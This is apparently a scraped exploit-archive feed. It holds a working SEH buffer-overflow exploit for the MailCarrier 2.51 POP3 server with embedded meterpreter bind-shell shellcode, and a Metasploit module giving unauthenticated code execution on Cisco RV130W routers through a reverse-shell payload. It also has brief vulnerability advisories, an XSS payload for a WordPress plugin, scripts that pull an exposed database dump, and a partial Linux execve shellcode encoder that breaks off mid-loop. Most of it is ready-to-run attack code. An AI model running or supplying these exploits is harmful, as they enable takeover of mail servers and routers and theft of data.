
MailCarrier 2.51 TOP Buffer Overflow


MailCarrier version 2.51 POP3 TOP command remote SEH buffer overflow exploit.


MD5 | 834bbc57fcd9c97c7276d8d8c4062ea4

#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "TOP" command(POP3)
# Date: 14/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - SEH Exploit
# POC
# 1.) Change ip, username, password and port in code
# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
#crash at 6175
import sys
import socket
import time

#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
# 680-byte payload produced by the msfvenom command quoted in the comment above
# (x86/alpha_mixed encoding, the listed bad characters excluded).
shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
"\x6f\x78\x55\x41\x41")

# Overflow buffer layout (total length is fixed at exactly 10000 bytes):
#   "A" * 6175           filler up to the crash offset recorded in the header ("crash at 6175")
#   "\xeb\x11\x90\x90"   4 bytes at the exception-record slot: short jump (eb 11) plus two NOPs
#   "\x0c\x11\x0d\x1b"   0x1b0d110c in little-endian - the msjet40.dll pop/pop/ret gadget from the header
#   "\x90" * 20          NOP slide into the payload
#   shellcode            680 bytes
#   "D" * (10000-6883)   pad to 10000; 6883 = 6175 + 4 + 4 + 20 + 680
# Defender notes: the handler address comes from a module the header lists as "SafeSEH: False",
# which is what SafeSEH/SEHOP are meant to catch; on the wire the trigger is a single POP3 TOP
# argument of ~10 kB, so the server-side fix is bounding that argument's length.
buffer = "A" * 6175 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6883)

# Python 2 script (print statements, str used as a byte buffer). Target host, port and the
# USER/PASS credentials are hard-coded (header, POC step 1); no error handling, so a refused
# connection or a closed socket raises an uncaught socket.error.
print "[*] Mail Server 2.51 POP3 Buffer Overflow in TOP command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))  # socket.connect returns None; `connect` is never used
print s.recv(1024)  # server banner
# TOP is only reachable after USER/PASS, i.e. this requires a valid (here: test/test) mailbox login.
print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)
print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)
print "[*] Sending TOP command plus evil buffer\r\n"
s.send('TOP ' + buffer + '\r\n')  # the overlong argument is the whole trigger; no response is read
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, check for meterpreter shell on port 443 of the target!"


Cisco RV130W Routers Management Interface Remote Command Execution


A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. Note: successful exploitation may not result in a session, and as such, on_new_session will never repair the HTTP server, leading to a denial-of-service condition.


MD5 | 6336d4a93f5e62a21b302b4b5a610e40

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# linux/armle/meterpreter/bind_tcp -> segfault
# linux/armle/meterpreter/reverse_tcp -> segfault
# linux/armle/meterpreter_reverse_http -> works
# linux/armle/meterpreter_reverse_https -> works
# linux/armle/meterpreter_reverse_tcp -> works
# linux/armle/shell/bind_tcp -> segfault
# linux/armle/shell/reverse_tcp -> segfault
# linux/armle/shell_bind_tcp -> segfault
# linux/armle/shell_reverse_tcp -> segfault
#
# Metasploit exploit module for CVE-2019-1663 (Cisco RV130W web management interface,
# firmware before 1.0.3.45).
# Call flow: exploit -> execute_cmdstager -> execute_command(cmd) -> prepare_shellcode(cmd)
# -> send_request(buffer); each staged command is delivered inside the login form's 'pwd' field.
# The author's payload compatibility notes are listed above the class.
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

# Module metadata. Targets[0] holds the per-firmware constants consumed by p/prepare_shellcode:
#   'offset'         filler length in front of the ROP chain
#   'libc_base_addr' fixed libc load address (a fixed value presumes no library randomisation on
#                    this firmware - TODO confirm against the advisory)
#   'system_offset', 'gadget1', 'gadget2'  offsets inside libc, see the inline comments
# Stability is declared CRASH_SERVICE_DOWN: the web server does not survive the overflow.
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco RV130W Routers Management Interface Remote Command Execution',
'Description' => %q{
A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router
could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.

The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.

A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
system of the affected device as a high-privilege user.

RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.

Note: successful exploitation may not result in a session, and as such,
on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
},
'Author' =>
[
'Yu Zhang', # Initial discovery
'Haoliang Lu', # Initial discovery
'T. Shiomitsu', # Initial discovery
'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
],
'License' => MSF_LICENSE,
'Platform' => %w[linux],
'Arch' => [ARCH_ARMLE],
'SessionTypes' => %w[meterpreter],
'CmdStagerFlavor' => %w{ wget },
'Privileged' => true, # BusyBox
'References' =>
[
['CVE', '2019-1663'],
['BID', '107185'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
],
'DefaultOptions' => {
'WfsDelay' => 10,
'SSL' => true,
'RPORT' => 443,
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
},
'Targets' =>
[
[ 'Cisco RV130/RV130W < 1.0.3.45',
{
'offset' => 446,
'libc_base_addr' => 0x357fb000,
'system_offset' => 0x0004d144,
'gadget1' => 0x00020e79, # pop {r2, r6, pc};
'gadget2' => 0x00041308, # mov r0, sp; blx r2;
'Arch' => ARCH_ARMLE,
}
],
],
'DisclosureDate' => 'Feb 27 2019',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SERVICE_DOWN, ],
},
))
end

# Returns libc_base_addr + offset as 4 little-endian bytes.
# Implementation: hex string -> raw bytes via pack('H*') -> byte order reversed. This is only
# correct while the hex string has an even number of digits (8 for the addresses above); a
# value below 0x10000000 would be mis-packed.
def p(offset)
[(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse
end

# Builds the overflow buffer: 'offset' bytes of filler, then the two-gadget chain described by
# the inline comments (gadget1 pops system's address into r2 and junk into r6, gadget2 points
# r0 at the stack and calls r2), then the command text itself, which presumably ends up as
# system()'s argument - the target constants in initialize fix every address.
def prepare_shellcode(cmd)
#All these gadgets are from /lib/libc.so.0
shellcode = rand_text_alpha(target['offset']) + # filler
p(target['gadget1']) +
p(target['system_offset']) + # r2
rand_text_alpha(4) + # r6
p(target['gadget2']) + # pc
cmd
shellcode
end

# POSTs the buffer to /login.cgi in the 'pwd' field of an otherwise ordinary, unauthenticated
# login form; a random 5-letter user name is supplied. NOTE: the `"key": value` literal form
# creates Symbol keys, not String keys. A refused/dropped connection becomes Failure::Unreachable.
def send_request(buffer)
begin
send_request_cgi({
'uri' => '/login.cgi',
'method' => 'POST',
'vars_post' => {
"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": 0,
"change_action": "",
"enc": 1,
"user": rand_text_alpha_lower(5),
"pwd": buffer,
"sel_lang": "EN"
}
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
end
end

# Entry point: the CmdStager mixin (flavor wget) calls execute_command once per staged command.
def exploit
print_status('Sending request')
execute_cmdstager
end

# CmdStager callback: wraps one command in the overflow buffer and sends it. `opts` is unused here.
def execute_command(cmd, opts = {})
shellcode = prepare_shellcode(cmd.to_s)
send_request(shellcode)
end

# Post-exploitation repair: there is no process continuation, so httpd is restarted from the new
# session (shell or meterpreter). The `ensure` clause without a `begin` covers the whole method
# body, so the parent's on_new_session always runs even if the restart raises. As the
# description notes, this only happens when a session is actually obtained.
def on_new_session(session)
# Given there is no process continuation here, the httpd server will stop
# functioning properly and we need to take care of proper restart
# ourselves.
print_status("Reloading httpd service")
reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
if session.type.to_s.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
else
session.shell_command(reload_httpd_service)
end
ensure
super
end
end

Splunk Enterprise HTML Injection Vulnerability



Splunk Enterprise is prone to an HTML injection vulnerability.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user or gain access to sensitive information. Other attacks are also possible.

Information

Bugtraq ID: 97286
Class: Input Validation Error
CVE: CVE-2017-5607

Remote: Yes
Local: No
Published: Mar 27 2017 12:00AM
Updated: Apr 15 2019 06:00PM
Credit: John Page (hyp3rlinx)
Vulnerable: Splunk Splunk Enterprise 6.5.2
Splunk Splunk Enterprise 6.4.4
Splunk Splunk Enterprise 6.4.1
Splunk Splunk Enterprise 6.3.9
Splunk Splunk Enterprise 6.3.1
Splunk Splunk Enterprise 6.2.13
Splunk Splunk Enterprise 6.2.12
Splunk Splunk Enterprise 6.2.9
Splunk Splunk Enterprise 6.2.8
Splunk Splunk Enterprise 6.2.7
Splunk Splunk Enterprise 6.2.6
Splunk Splunk Enterprise 6.2.5
Splunk Splunk Enterprise 6.2.4
Splunk Splunk Enterprise 6.2.3
Splunk Splunk Enterprise 6.2.1
Splunk Splunk Enterprise 6.2
Splunk Splunk Enterprise 6.1.12
Splunk Splunk Enterprise 6.1.9
Splunk Splunk Enterprise 6.1.8
Splunk Splunk Enterprise 6.1.7
Splunk Splunk Enterprise 6.1.6
Splunk Splunk Enterprise 6.1.5
Splunk Splunk Enterprise 6.1.4
Splunk Splunk Enterprise 6.1.3
Splunk Splunk Enterprise 6.1.2
Splunk Splunk Enterprise 6.1.1
Splunk Splunk Enterprise 6.0.13
Splunk Splunk Enterprise 6.0.6
Splunk Splunk Enterprise 6.0.4
Splunk Splunk Enterprise 6.0.3
Splunk Splunk Enterprise 6.0
Splunk Splunk Enterprise 5.0.17
Splunk Splunk Enterprise 5.0
Splunk Splunk Enterprise 6.5.1
Splunk Splunk Enterprise 6.5.0
Splunk Splunk Enterprise 6.4.5
Splunk Splunk Enterprise 6.4.3
Splunk Splunk Enterprise 6.4.2
Splunk Splunk Enterprise 6.4.0
Splunk Splunk Enterprise 6.3.0
Splunk Splunk Enterprise 6.2.2
Splunk Splunk Enterprise 6.2.11
Splunk Splunk Enterprise 6.2.10
Splunk Splunk Enterprise 6.1.11
Splunk Splunk Enterprise 6.1.10
Splunk Splunk Enterprise 6.1.0
Splunk Splunk Enterprise 6.0.12
Splunk Splunk Enterprise 6.0.11
Splunk Splunk Enterprise 5.0.16
Splunk Splunk Enterprise 5.0.15
Splunk Light 6.5
Splunk Light 6.4.2
Splunk Light 6.4.1
Splunk Light 6.4
Splunk Light 6.3.5
Splunk Light 6.3.4
Splunk Light 6.3.3
Splunk Light 6.3.2
Splunk Light 6.3.1
Splunk Light 6.3
Splunk Light 6.5.1


Not Vulnerable: Splunk Splunk Enterprise 6.5.3
Splunk Splunk Enterprise 6.4.6
Splunk Splunk Enterprise 6.3.10
Splunk Splunk Enterprise 6.2.14
Splunk Splunk Enterprise 6.1.13
Splunk Splunk Enterprise 6.0.14
Splunk Splunk Enterprise 5.0.18
Splunk Splunk Enterprise 6.2.13.1
Splunk Light 6.5.2


Exploit


Attackers can exploit this issue using a browser or readily available tools.


    Multiple Westermo Routers Multiple Security Vulnerabilities



    Multiple Westermo Routers are prone to the following security vulnerabilities:

    1. A hard-coded credentials vulnerability
    2. A cross-site request forgery vulnerability
    3. A hard-coded cryptographic key vulnerability

    Attackers can exploit these issues to bypass authentication mechanisms, to perform unauthorized actions and gain access to the affected application and to read and modify intercepted traffic.

    Information

    Bugtraq ID: 100470
    Class: Input Validation Error
    CVE: CVE-2017-5816
    CVE-2017-12709
    CVE-2017-12703
    CVE-2016-5816

    Remote: Yes
    Local: Yes
    Published: Aug 24 2017 12:00AM
    Updated: Apr 15 2019 06:00PM
    Credit: Mandar Jadhav from Qualys Security
    Vulnerable: Westermo MRD-455 1.7.5.0
    Westermo MRD-355 1.7.5.0
    Westermo MRD-315 1.7.5.0
    Westermo MRD-305-DIN 1.7.5.0


    Not Vulnerable: Westermo MRD-455 1.7.7.0
    Westermo MRD-355 1.7.7.0
    Westermo MRD-315 1.7.7.0
    Westermo MRD-305-DIN 1.7.7.0


    Exploit


    Attackers can use readily available tools to exploit these issues.


      RETIRED: LibTIFF CVE-2017-7599 Denial of Service Vulnerability



      LibTIFF is prone to a denial-of-service vulnerability.

      Attackers can exploit this issue to crash the affected application, resulting in a denial-of-service condition.

      LibTIFF 4.0.7 is vulnerable; other versions may also be vulnerable. Retired as a duplicate of BID 97508 LibTIFF CVE-2017-7599 Denial of Service Vulnerability.

      Information

      Bugtraq ID: 97505
      Class: Design Error
      CVE: CVE-2017-7599

      Remote: Yes
      Local: No
      Published: Apr 09 2017 12:00AM
      Updated: Apr 15 2019 07:00PM
      Credit: Agostino Sarubbo of Gentoo.
      Vulnerable: LibTIFF LibTIFF 4.0.7


      Not Vulnerable:

      Exploit


      The researcher has created a proof-of-concept to demonstrate the issue. Please see the references for more information.


        WordPress Download Manager 2.9.92 Cross Site Scripting


        WordPress Download Manager plugin version 2.9.92 suffers from a cross site scripting vulnerability.


        MD5 | bb8b5efd41990f8b6901e44dfe22b53d

        * Exploit Title: WordPress Download Manager Cross-site Scripting
        * Discovery Date: 2019-04-13
        * Exploit Author: ThuraMoeMyint
        * Author Link: https://twitter.com/mgthuramoemyint
        * Vendor Homepage: https://www.wpdownloadmanager.com
        * Software Link: https://wordpress.org/plugins/download-manager
        * Version: 4.9.1
        * Category: WebApps, WordPress

        Description
        --

        In the pro features of the WordPress Download Manager plugin, there is a Category Short-code feature which can be used to sort categories by an order-by function, invoked as ?orderby=title,publish_date .
        By appending "> followed by any XSS payload to that parameter, the XSS payload will execute.

        To reproduce,

        1.Go to the link where we can find ?orderby
        2.Add parameters >” and give simple payload like <script>alert(1)</script>
        3.The payload will execute.
        --

        PoC
        --

        <div class="btn-group btn-group-sm pull-right"><button type="button" class="btn btn-primary" disabled="disabled">Order &nbsp;</button><a class="btn btn-primary" href="https://demo.wpdownloadmanager.com/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a class="btn btn-primary" href="https://demo.wpdownloadmanager.com/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>

        --

        Demo -:https://demo.wpdownloadmanager.com/wpdmpro/category-short-code/?orderby=publish_date%22%3E%3Cscript%3Ealert(11)%3C/script%3E&order=desc




        NIT-Warangal Dispensary Management System India 1.0 Database Disclosure


        NIT-Warangal Dispensary Management System India version 1.0 suffers from a database disclosure vulnerability.


        MD5 | 21273b6ebbe06c22e806d2fc5d44b89d

        ###########################################################################

        # Exploit Title : NIT-Warangal Dispensary Management System India 1.0 Database Disclosure
        # Author [ Discovered By ] : KingSkrupellos
        # Team : Cyberizm Digital Security Army
        # Date : 15/04/2019
        # Vendor Homepage : nitw.ac.in
        # Software Download Link : github.com/NIT-Warangal/DispensaryMS/archive/master.zip
        # Sofware Information : nitw.ac.in/main/facilities/medical/
        en.wikipedia.org/wiki/National_Institute_of_Technology,_Warangal
        # Software Version : 1.0
        # Tested On : Windows and Linux
        # Category : WebApps
        # Exploit Risk : Medium
        # Vulnerability Type :
        CWE-200 [ Information Exposure ]
        CWE-538 [ File and Directory Information Exposure ]
        # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
        # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
        # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
        # Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
        acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
        # Acunetix Reference Link About : [ Possible Database Backup File ]
        acunetix.com/vulnerabilities/web/possible-database-backup/

        ###########################################################################

        # Information about Software :
        ****************************
        This project is an effort to reduce the amount of paperwork that's used in the dispensary system

        at NIT-Warangal. It aims to computerize the process of a student/professor getting their medication

        and at the same time serve as a validation system to pharmacy medication and inventory system.

        ###########################################################################

        # Impact :
        ***********
        * The product stores sensitive information in files or directories that are accessible

        to actors outside of the intended control sphere.

        * An information exposure is the intentional or unintentional disclosure of information

        to an actor that is not explicitly authorized to have access to that information.

        * phpMyAdmin is a free software tool written in PHP, intended to handle the administration of

        MySQL over the World Wide Web. It can be used to dump a database or a collection of

        databases for backup or transfer to another SQL server (not necessarily a MySQL server).

        The dump typically contains SQL statements to create the table, populate it, or both.

        This file contains an phpMyAdmin SQL dump. This information is highly sensitive and

        should not be found on a production system.

        * It looks like this file contains a database backup/dump.

        Acunetix inferred this filename from the domain name. A database backup contains a record of the

        table structure and/or the data from a database and is usually in the form of a list of SQL statements.

        A database backup is most often used for backing up a database so that its contents can be restored

        in the event of data loss. This information is highly sensitive and should never be found on a production system.

        Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible

        to the web server. As a workaround, you could restrict access to this file.

        Development Set Up =>
        **********************
        Mac OS X and Linux =>
        ***********************
        1. Go to the required folder , eg. ~/Documents
        2. git clone https://github.com/NIT-Warangal/DispensaryMS
        3. cd DispensaryMS
        4. virtualenv venv
        5. source venv/bin/activate
        6. pip install -r requirements.txt
        7. open the config.py file and set the required files.
        8. Open mysql and set up the database and sync the .sql file
        9. Open a new terminal tab and enter into venv as in step 5
        10. sudo python -m smtpd -n -c DebuggingServer localhost:25
        11. Switch back to the previous tab while keeping this running.
        12. python Dispensary.py

        Windows Setup =>
        ********************
        1. Open cmd in administrator mode.
        2. Type "pip install flask".
        3. Type "pip install -r requirements.txt".
        4. Type "pip install flask-mysql" (if its fails do step 5 )
        5. Download connecter from http://www.codegood.com/
        6. Go to project folder and type "python server.py"

        (It may show some errors for some dependencies)
        1. Type "pip install -r requirements.txt".
        2. Type "python server.py"
        (Assumed the SQL using is XAMPP's MYSQL)

        Server Deployment =>
        *********************
        For best use a Ubuntu server or a CentOS server
        1. Follow the same development setup
        2. open screen mode in terminal
        3. run python Dispensary.py

        install.sh
        *********
        git clone https://www.github.com/NIT-Warangal/DispensaryMS
        cd DispensaryMS
        source venv/bin/activate
        sudo pip install -r requirements.txt
        python server.py

        ###########################################################################

        File :
        ******
        /Dispensary.sql

        Information :
        *************
        -- phpMyAdmin SQL Dump
        -- version 4.1.12
        -- phpmyadmin.net
        --
        -- Host: 127.0.0.1
        -- Server version: 5.5.37-0ubuntu0.14.04.1
        -- PHP Version: 5.5.11
        -- Database: `Dispensary`

        -- Table structure for table `Employee`

        -- Dumping data for table `Employee`

        -- Table structure for table `Login`

        -- Table structure for table `Bills` to keep track of uploads

        -- Table structure for table `Pharmacy`

        -- Table structure for table `Prescription`

        -- Table structure for table `PrescriptionIndex`

        -- Table structure for table `Student`

        -- Table structure for table `Users`

        -- Table structure for table `Letters` to keep track of uploads

        -- Table structure for table `ResetPassword` to keep track of uploads

        -- Table structure for table `CheckPassword` to keep track of uploads

        -- Table structure for table `ChatSessionHistory`

        -- Table structure for table `ChatTransactions`

        -- Dump Completed.

        raw.githubusercontent.com/NIT-Warangal/DispensaryMS/master/Dispensary.sql

        Information about File :
        ********************
        /config.py

        Information :
        ************
        # Database Config

        config = {
        'MYSQL_DATABASE_USER' : '', #Username for mysql
        'MYSQL_DATABASE_DB' : 'Dispensary',
        'MYSQL_DATABASE_PASSWORD' : '', # Password to connect to mysql
        'MYSQL_DATABASE_HOST' : 'localhost',
        'USERNAME' : '',
        'USERID' :'',
        }

        # To run the mail server run
        # sudo python -m smtpd -n -c DebuggingServer localhost:25
        # mail server settings

        MAIL_SERVER = 'localhost'
        MAIL_PORT = 25
        MAIL_USERNAME = None
        MAIL_PASSWORD = None

        # Administrator list
        ADMINS = ['you@example.com']

        raw.githubusercontent.com/NIT-Warangal/DispensaryMS/master/config.py

        ###########################################################################

        # Database Disclosure Information Exposure Exploit 1 :
        ***********************************************
        #!/usr/bin/python
        import string
        import re
        from urllib2 import Request, urlopen
        # Python 2 check (urllib2, raw_input, print statement) for a world-readable phpMyAdmin dump
        # at <URL>/Dispensary.sql. The remediation stated above applies: dumps do not belong under
        # the web root. `string`, imported above, is never used.
        disc = "/Dispensary.sql"
        url = raw_input ("URL: ")
        req = Request(url+disc)
        rta = urlopen(req)  # a non-2xx response raises urllib2.HTTPError here - not handled
        print "Result"
        html = rta.read()
        # Reports only text matching "resources.*=*"; "=*" matches zero or more '=', so the pattern
        # is effectively "resources.*" and a dump without that word prints "[]".
        rdo = str(re.findall("resources.*=*", html))
        print rdo
        exit  # bare name, not a call: this statement does nothing (the script ends anyway)

        ###########################################################################

        # Database Disclosure Information Exposure Exploit 2 :
        ***********************************************
        #!/usr/bin/perl -w
        # Author : KingSkrupellos
        # Team : Cyberizm Digital Security Army

        use LWP::Simple;
        use LWP::UserAgent;

        # Windows console housekeeping. The second system() call passes the banner text as a command,
        # so it cannot succeed (presumably `title` was intended); its result is ignored either way.
        system('cls');
        system('NIT-Warangal Dispensary Management System 1.0 Database Disclosure Exploit');
        system('color a');


        # Usage check: host and path are required; the third @ARGV slot is overwritten below anyway.
        if(@ARGV < 2)
        {
        print "[-]How To Use\n\n";
        &help; exit();
        }
        # Prints usage. Called with & above its definition, which Perl permits.
        sub help()
        {
        print "[+] usage1 : perl $0 site.com /path/ \n";
        print "[+] usage2 : perl $0 localhost / \n";
        }
        ($TargetIP, $path, $File,) = @ARGV;

        # Any $File given on the command line is discarded; the file name is fixed.
        $File="Dispensary.sql";
        # Plain http only; $path is concatenated as-is, so it must carry its own trailing '/' (see usage).
        my $url = "http://" . $TargetIP . $path . $File;
        print "\n Wait Please Dear Hacker!!! \n\n";

        # The response body is streamed straight into a fixed Windows path; if that path is not
        # writable the save fails - TODO confirm how LWP reports that in $request.
        my $useragent = LWP::UserAgent->new();
        my $request = $useragent->get($url,":content_file" => "D:/Dispensary.sql");

        # is_success only checks the HTTP status: a 200 carrying an HTML "not found" page or a
        # login redirect body is still reported as a hit, so the saved file must be inspected.
        if ($request->is_success)
        {
        print "[+] $url Exploited!\n\n";
        print "[+] Database saved to D:/Dispensary.sql\n";
        exit();
        }
        else
        {
        print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
        exit();
        }

        ###########################################################################

        # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

        ###########################################################################

        Linux/x86 MMX-PUNPCKLBW Encoder Shellcode


        61 bytes small Linux/x86 MMX-PUNPCKLBW encoder shellcode.


        MD5 | 245a2cc2caaef0f2ee17516eac6ae580

        ################################################################################
        INTRO
        ################################################################################

        # Exploit Title: MMX-PUNPCKLBW Encoder
        # Description: Payload encoder using MMX PUNPCKLBW instruction
        # Date: 13/04/2019
        # Exploit Author: Petr Javorik
        # Tested on: Linux ubuntu 3.13.0-32-generic x86
        # Shellcode length: 61

        ################################################################################
        ENCODER
        ################################################################################

        #!/usr/bin/env python

        # stack execve
        # stack execve
        # 25-byte payload to encode (the pushed dwords spell "//sh" and "/bin"); runs under Python 2 or 3.
        SHELLCODE = bytearray(
        b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
        )

        # Align to qword multiples
        # NOTE: when the length is already a multiple of 8 this still appends a full block of 8 NOPs.
        missing_bytes = 8 - (len(SHELLCODE) % 8)
        padding = [0x90 for _ in range(missing_bytes)]
        SHELLCODE.extend(padding)

        # Shuffle payload
        shuffled_payload = []
        # First byte carries count of needed PUNPCKLBW loops
        loop_count = len(SHELLCODE)//8
        shuffled_payload.append(loop_count)
        for block_num in range(0, loop_count):
            current_block = SHELLCODE[(8 * block_num) : (8 * block_num + 8)]
